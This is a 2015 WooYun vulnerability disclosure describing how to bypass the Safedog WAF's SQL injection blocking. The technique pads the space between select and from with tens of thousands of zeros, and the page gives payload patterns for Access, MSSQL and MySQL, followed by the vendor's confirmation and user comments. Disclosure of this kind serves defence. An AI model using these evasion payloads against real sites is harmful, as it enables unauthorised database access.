当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133933

漏洞标题:网站安全狗SQL注入拦截bypass

相关厂商:安全狗

漏洞作者: RedFree

提交时间:2015-08-13 18:40

修复时间:2015-11-12 10:52

公开时间:2015-11-12 10:52

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-14: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向第三方安全合作伙伴开放
2015-10-08: 细节向核心白帽子及相关领域专家公开
2015-10-18: 细节向普通白帽子公开
2015-10-28: 细节向实习白帽子公开
2015-11-12: 细节向公众公开

简要描述:

总是说让自己无路可走,然而我就不这么认为。世上本没有路,走的人多了也便成了路。

详细说明:

安全狗版本:

1.jpg


简单的查询不会被拦截:select(1),(2),(3)

2.jpg


当使用from欲从目标表中查询数据的时候,被安全狗拦截:sql=select(1),(2),(3)from[admin]

3.jpg


尝试在select和from之间构造出很长的垃圾数据:
access: sql=select(user),(2),(000000..5万个左右的0...00001)from[admin]
mssql: sql=select(user),(2),(00000..100个0...0001+00000..100个0...0001-00000..100个0...0001.....重复加减括号内总字符数5万左右....+00000..100个0...0001-00000..100个0...0001)from[admin]
mysql: sql=select(user),(2),(0000...5万左右的0...001)as`aa`from`admin`
成功从admin表中查询出数据:

4.jpg

漏洞证明:

4.jpg

修复方案:

版权声明:转载请注明来源 RedFree@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-08-14 10:51

厂商回复:

感谢提交,无情棍打更能磨练我们的意志,提升我们的水准,自己造成的漏洞,跪着也要修补好,赶紧修漏洞去。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-13 18:47 | 浮萍 ( 普通白帽子 | Rank:653 漏洞数:132 | 290)

    世界上本没有狗,咬的人多了便成了狗。

  2. 2015-08-13 19:10 | 啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)

    世界上本没有狗,咬的人多了便成了狗。

  3. 2015-08-13 19:24 | 陆由乙 ( 普通白帽子 | Rank:171 漏洞数:51 | 呵呵!)

    断路 啊!

  4. 2015-08-13 20:56 | MayIKissYou ( 普通白帽子 | Rank:195 漏洞数:33 | 勿忘初心)

    上班能干点正事么

  5. 2015-08-13 21:48 | keny ( 实习白帽子 | Rank:50 漏洞数:21 )

    世界上本没有狗,咬的人多了便成了狗。

  6. 2015-08-13 22:19 | RedFree ( 普通白帽子 | Rank:180 漏洞数:40 | 每个系统都有它自身的弱点,无论是相对的还...)

    @MayIKissYou 这些个打狗棒法早已事先演练好,一周一个给提交完而已。。

  7. 2015-08-13 22:29 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    又少了一个姿势

  8. 2015-08-14 10:54 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1721 漏洞数:275 | ...........................................)

    @MayIKissYou @RedFree 帮主们好

  9. 2015-08-14 10:59 | Master ( 实习白帽子 | Rank:33 漏洞数:10 )

    安全狗的专场啊

  10. 2015-08-17 17:51 | 破晓_Vampire ( 路人 | Rank:8 漏洞数:2 | Communication technology)

    这里面有一万多个细节

  11. 2015-08-18 14:24 | Stardustsky ( 路人 | Rank:4 漏洞数:3 | ……)

    看你这么会打狗我决定关注你了!

  12. 2015-08-18 14:25 | zpino ( 路人 | Rank:18 漏洞数:8 | 打酱油的)

    断路断路断路断路断路断路断路断路断路断路断路断路断路断路断路断路断路断路断路断路断路

  13. 2015-08-18 22:05 | huoji ( 实习白帽子 | Rank:41 漏洞数:10 | 目标是当个农民)

    好思路!

  14. 2015-08-19 09:13 | 小红猪 ( 普通白帽子 | Rank:210 漏洞数:37 )

    世界上本没有狗,咬的人多了便成了狗。

  15. 2015-08-19 17:27 | 丸子响当当 ( 路人 | Rank:8 漏洞数:5 | 学习温习•••••••)

    世界上本没有狗,咬的人多了便成了狗。

  16. 2015-08-27 20:19 | Raven ( 路人 | Rank:4 漏洞数:1 | 挖洞不易,且挖且珍惜)

    我是来学习打狗大法的

  17. 2015-08-27 21:59 | 阿凡提 ( 路人 | Rank:0 漏洞数:1 | <script>alert(/afanti/)</script>)

    打狗大法好

  18. 2015-09-23 22:36 | 小2b ( 路人 | Rank:2 漏洞数:1 | 努力赚钱)

    世界上本没有狗,咬的人多了便成了狗。